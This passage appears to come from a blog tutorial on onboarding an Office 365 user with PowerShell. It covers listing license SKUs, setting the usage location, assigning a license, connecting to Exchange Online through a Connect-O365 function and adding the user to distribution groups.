Now we need to add a license to the user account. We need to do two things before we can assign the licenses. First is we need to to determine the different sku’s we have available to license, and second, we need to set the usage location. To accomplish the first part, we can issue the command:

Get-MsolAccountSku

Second, by using the instructions here: https://social.technet.microsoft.com/Forums/ie/en-US/bfde2a73-579c-409b-a7cd-77110048c7b7/license-enabling-script?forum=onlineservicesadministrationcenter

We can set the MS Online user’s principal location:

Set-MsolUser -UserPrincipalName user1@contoso.com -UsageLocation US


Set-MsolUserLicense -UserPrincipalName user1@contoso.com -AddLicenses Contoso:STANDARDPACK

Now that the user is licensed, we will add the account to a few Exchange Distribution Groups. We will need to import a new PSSession from outlook.com before we can run the Exchange commands. Import the session by first creating a function called “Connect-O365” by running the following (just like we created the function find-dn above):

function Connect-O365{
 $o365cred = Get-Credential username@domain.onmicrosoft.com
 $session365 = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri "https://ps.outlook.com/powershell/" -Credential $o365cred -Authentication Basic -AllowRedirection 
 Import-Module (Import-PSSession $session365 -AllowClobber) -Global
}

Save and name this function: Connect-O365.ps1 and run it. We now have a function that we can run:

.\Connect-O365.ps1
Connect-O365

(enter creds)

Now we can add the distribution group members with the group identity and member name in quotes:

 

Add-DistributionGroupMember -Identity "Finance" -Member "user1@contoso.com"

Add-DistributionGroupMember -Identity "AllEmployees" -Member "user1@contoso.com"

A number of these scripts and commands can be combined into .ps1 files to optimize the workflow even further. With the information here you should have a good place to start. Let me know in the comments how you added your own features to the procedure.